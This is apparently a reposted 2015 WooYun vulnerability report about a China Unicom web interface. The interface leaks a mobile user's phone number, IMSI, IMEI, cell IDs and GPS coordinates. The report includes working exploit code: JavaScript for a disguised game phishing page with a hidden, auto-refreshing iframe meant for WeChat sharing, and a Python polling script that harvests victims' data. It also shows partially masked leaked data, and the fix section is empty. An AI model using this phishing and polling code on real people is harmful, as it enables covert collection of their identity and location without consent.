记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

利用中国联通所属机构某系统接口缺陷在非Wi-Fi环境下可导致部分手机信息和LBS信息泄露风险

2015-02-22 19:00

http://www.unicomlabs.com/联通此站存在设计缺陷

手机使用3G或4G数据连接访问http://www.unicomlabs.com/ 可查询当前手机号、IMSI、上线基站号、上线小区号、地球座标、火星座标等

通过抓包我们发现 当访问http://www.unicomlabs.com 时 response中iframe了一个链接

http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58



经测试发现 如果手机使用3G或4G数据连接访问http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58

1.jpg



086231202CAB7AB869AD22757424AC69.jpg





此时立即在电脑上同样打开此链接 就能看到你的手机号、IMSI、上线基站号、上线小区号、地球座标、火星座标等信息

2.jpg





利用方法:将链接http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58嵌入到钓鱼页面中发给对方

本地监控该链接可获取对方的手机号等信息



这里我制作了一个html5的小游戏的钓鱼页面,可在微信朋友圈中分享,本地利用脚本实时监控即可。

主要代码:

code 区域
<SCRIPT LANGUAGE="JavaScript"> 

<!--

function fresh(){

document.getElementById('frame0').src='http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58';

setTimeout("fresh()",5000);

}

setTimeout("fresh()",5000);

//-->

</SCRIPT>

<iframe id="frame0" src="http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58"width="0" height="0" scrolling="yes" frameborder="0" style= "display :none " />



本地端用python写个脚本监控即可

code 区域
import requests

import re

import sys

type = sys.getfilesystemencoding()

print '监听中...'

headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36'}

key = '无法检测号码'

for x in xrange(1,100000):

r = requests.get('http://www.unicomlabs.com/Number.asp?unikey=660275b7d6ba757b74587343208f6003#',headers=headers)

s = r.content.decode("gbk").encode(type)

if(s.find(key)>0):

print '第'+str(x)+'次请求'

else:

print '第'+str(x)+'次请求获取数据成功!】'

f=open("un.html",'a')

f.write(s+'\n\n')

f.close()



FD129698E2967E07C7BFF66104EFD805.jpg





屏幕快照 2015-01-08 下午3.49.59.png



2EDA38E1-F3F5-4817-8D3A-B5717BA026BF.png

漏洞证明:

获取到的数据



code 区域
本机号码18600*****7

IMSI460010***6***67

我的话费点击查看

承载网络WCDMA

接入APN3GNET

终端IMEI355***05344***0

终端型号HTC HTC 802w

生产厂商HTC Corp

上线基站号41**2

上线小区号22**1

地球座标E116.**01,N40.0**6

火星座标E116.2**22,N40.0**86



staticimage.png



修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-090676

阅读:105467 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“利用中国联通所属机构某系统接口缺陷在非Wi-Fi环境下可导致部分手机信息和LBS信息泄露风险”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词